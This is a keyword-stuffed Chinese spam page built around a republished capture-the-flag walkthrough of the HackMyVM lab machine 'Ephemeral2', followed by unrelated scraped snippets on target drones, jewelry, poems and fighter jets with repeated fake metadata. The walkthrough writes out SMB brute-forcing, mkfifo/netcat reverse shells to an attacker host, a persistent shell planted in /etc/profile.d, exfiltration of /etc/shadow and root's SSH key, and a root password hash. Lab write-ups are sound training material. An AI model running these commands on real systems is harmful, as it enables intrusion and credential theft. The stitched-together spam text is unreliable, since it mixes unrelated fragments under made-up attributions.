编辑:穿孔机厂家,来源:百度知道,浏览量:172,时间:2022-04-18 08:00
打i靶机,戴钯金有什么好处,带吧唧的网名
渗透测试练习No.77 HackMyVm Ephemeral2 收录于话题靶机信息
下载地址:
https://hackmyvm.eu/machines/machine.php?vm=Ephemeral2网盘链接:https://pan.baidu.com/s/1MYO7cEOg2xou1FrC40v6qg?pwd=ja7r靶场: HackMyVm.eu
靶机名称: Ephemeral2
难度: 简单
发布时间: 2022年4月12日
提示信息:
无目标: user.txt和root.txt
实验环境攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only靶机:Vbox linux IP自动获取 网卡host-Only信息收集主机局域网内的靶机IP地址
sudo netdiscover -r 10.0.0.0/24 -i eth1到主机地址为10.0.0.141
端口靶机开放的服务端口
sudo nmap -sC -sV -p- 10.0.0.141 -oN nmap.log到开放22、80、139、445端口,先来看看80端口
Web渗透做个目录,检查敏感路径
gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.141 -x php,html,txt,zip发现foodservice目录,继续(github的图床上传图片太费劲,换成文本来显示)
┌──(pikachu㉿kali)-[/mnt/hgfs/HackTools/HackMyVM/Ephemeral2]└─$ gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.141/foodservice -x php,html,txt,zip===============================================================Gobuster v3.1.0by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://10.0.0.141/foodservice[+] Method: GET[+] Threads: 10[+] Wordlist: ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0[+] Extensions: php,html,txt,zip[+] Timeout: 10s===============================================================2022/04/12 07:49:42 Starting gobuster in directory enumeration mode===============================================================/images (Status: 301) [Size: 321] [--> http://10.0.0.141/foodservice/images/]/index.html (Status: 200) [Size: 16429] /icon (Status: 301) [Size: 319] [--> http://10.0.0.141/foodservice/icon/] /css (Status: 301) [Size: 318] [--> http://10.0.0.141/foodservice/css/] /js (Status: 301) [Size: 317] [--> http://10.0.0.141/foodservice/js/] /fonts (Status: 301) [Size: 320] [--> http://10.0.0.141/foodservice/fonts/] ===============================================================2022/04/12 07:55:19 Finished===============================================================再来访问foodservice目录
http://10.0.0.141/foodservice/访问后没有发现可利用的信息,再来看看其他端口
SMB攻击检查账户信息enum4linux -U 10.0.0.141服务器允许空的账号密码连接,并且找到一个用户randy
查看共享信息enum4linux -S 10.0.0.141发现共享目录和打印机,尝试连接
smbclient '\\10.0.0.141\IPC$'未发现可利用信息,其他目录都需要密码,尝试暴破randy账号,
SMB密码暴破
git clone https://github.com/NullByte007/SMBRUTE.gitcd SMBRUTEpython3 SMBRUTE.py -t 10.0.0.141 -u user.txt -p ../../../Dict/SecLists-2022.1/Passwords/richelieu-french-top5000.txt拿到密码,挂载SYSADMIN到本地
sudo mount -t cifs -o username=randy //10.0.0.141/SYSADMIN /mnt/tmp挂载成功,查看内容
cd /mnt/tmpls发现3个文件,查看内容
cat smb.conf配置文件中magic script中配置了脚本,该脚本存在/mnt目录下就会被执行然后删除,来上传个反弹shell验证一下
1。攻击机新建窗口并监听4444端口
nc -lvvp 44442。生成脚本并复制到/mnt目录下
vi shell.shsudo cp shell.sh /mnt/smbscript.elfrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.3 4444 >/tmp/f反弹成功,先切换到交互式shell再来找找敏感信息
python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermCtrl+z快捷键stty raw -echo;fgreset上传个辅助脚本来检查敏感信息
1。攻击机在脚本目录下开启HTTP服务
python3 -m http.server2。靶机上下载linpeas.sh脚本并执行
cd /tmpwget http://10.0.0.3:8000/linpeas.shchmod +x linpeas.sh./linpeas.sh发现用户ralph、
发现ralph用户身份定时运行的脚本
发现/etc/profile.d目录可写,该目录下的脚本在有用户登录SSH时,会以该用户的身份执行里面的脚本。
先来看看ssh.sh脚本内容
cat /home/ralph/tools/ssh.shSSH登录脚本,有了这个定时登录SSH的脚本,就可以在/etc/profile.d目录下写一个反弹shell,当ssh.sh脚本自动登录时便会触发反弹sehll脚本,验证一下
1。攻击机新开窗口监听3333端口
nc -lvvp 33332。在/etc/profile.d目录下写反弹shell脚本(
vi shell.shchmod +x shell.sh#!/bin/bashrm /tmp/g;mkfifo /tmp/g;cat /tmp/g|sh -i 2>&1|nc 10.0.0.3 3333 >/tmp/g反弹成功,拿到ralph权限,切换到交互式shell再查找敏感信息
lscat user.txt拿到user.txt,再来找找提权信息
sudo -l发现可以使用root用户身份执行getfile.py,执行这个脚本看看
sudo -u root /usr/bin/python3 /home/ralph/getfile.py运行后提示输入文件路径和IP地址
输入后发现这个脚本会向输入的地址发送文件,来验证一下
1。攻击机监听80端口
nc -lvvp 802。靶机再次执行脚本将shadow文件发送到攻击机的80端口
攻击机接收到shadow文件,拿来跑一下root密码
echo 'root:$6$ONBXfYmDyD2.uHR2$b8FgiI/1JXkRDB1noB5b3fObAXL3tbZj8QrUxpbmqcw99A17fIVY.6SZM2TrBY0WT1XY0n1T0ZNlx/XKfQNqh/:19092:0:99999:7:::' >shadowjohn shadow --wordlist=/usr/share/wordlists/rockyou.txt
在跑密码的过程中再次尝试传输文件,并且成功将/root/.ssh/id_rsa文件发送到攻击机上
将key保存为id_rsa后尝试登录SSH
vi id_rsachmod 600 id_rsassh root@10.0.0.141 -i id_rsa登录成功,查找flag
cat /root/roottxt/root.txt拿到root.txt,游戏结束。
(微完)热搜弹幕:打i靶机,戴钯金有什么好处,带吧唧的网名
打i靶机,pcb打靶机,打靶机是什么意思关于打i靶机内容导航:1、打i靶机2、打靶的机子3、打靶机是什么意思1、打i靶机 会被摧毁——这就是靶机的使命啊。靶机是一次性的,但不是只能使用一次——因为不是每次都能打中 实际上在绝大部分时候靶机是不会被摧毁的。蚊子再小也是肉,哪怕价值十几万的低档货,能不打掉也不会打掉的。一般来说是靶机用绳子拖一个靶子在天上飞,真正打的是那个靶子。演习的......
作者:穿孔机厂家,来源:腾讯视频,时间:2022-12-02 16:27,浏览量:209
打i靶机,电脑靶机什么意思,靶机怎么用关于打i靶机内容导航:1、打i靶机2、打靶的机子3、打靶机是什么意思1、打i靶机 除了美国之外,其他国家的高能激光武器都还在实验室阶段,远没有实用,美国现在主要是空中激光反导,以后肯定会上军舰的。 功率问题。现有的激光器功率不够,或者体积太大无法上舰。还有能源贮备问题。就像全电舰艇一样,谁都知道是好东西,但是现在也是电机功率不够。 ......
作者:穿孔机厂家,来源:油管,时间:2022-08-01 09:27,浏览量:198
打i靶机,靶机怎么打,靶机怎么打关于打i靶机内容导航:1、打i靶机2、打靶机是什么意思3、靶机是什么打i靶机 火蜂的机翼是中间悬挂式的,后掠,翼尖有一个倾角,发动机在腹部有一个膨胀的喷射口,进气口为椭圆形,初期口为圆形。机身是圆形而且向后逐渐缩小,鼻部比较尖,尾部为锥形,腹部有一个副翼。水平尾翼为上部高挂形,后掠 打靶机是什么意思您好,我看到您的问题很久没有人来回答,但是问题过期无人回答......
作者:穿孔机厂家,来源:优酷,时间:2022-06-12 00:20,浏览量:194
打i靶机,靶机怎么打,靶机怎么打关于打i靶机内容导航:1、打i靶机2、带芭蕉的诗句有哪些3、戴巴家是艾尔迪亚人打i靶机 Ichunqiu上有搭建好的靶机,在线渗透测试。 带芭蕉的诗句有哪些 1,秋风多,雨相和,帘外芭蕉三两窠。唐,李煜 《长相思·云一緺》释义:风声和雨声交杂在一起,窗外的芭蕉也是三三两两的,这漫漫的寂寥长夜叫人怎么办才好。2,水上游人沙上女,回顾,笑指芭蕉林里住。唐,欧......
作者:穿孔机厂家,来源:油管,时间:2022-05-30 14:25,浏览量:261
打i靶机,带钯金项链有什么好处,咏芭蕉的诗句打i靶机-写成闲话 美国空军21世纪的主力制空战斗机取代现役的F-15,执行夺取战区制空权的任务。 打i靶机-戴钯金有什么好处 F-22战斗机是美国洛克希德·马丁公司与波音公司为美国空军研制的21世纪初主力制空战斗机,主要用于替换美国空军现役的F-15战斗机,在美国空军武器装备发展中占有最优先的地位。2002年9月,美空军正式将F-22改......
作者:穿孔机厂家,来源:360问答,时间:2022-05-19 15:35,浏览量:232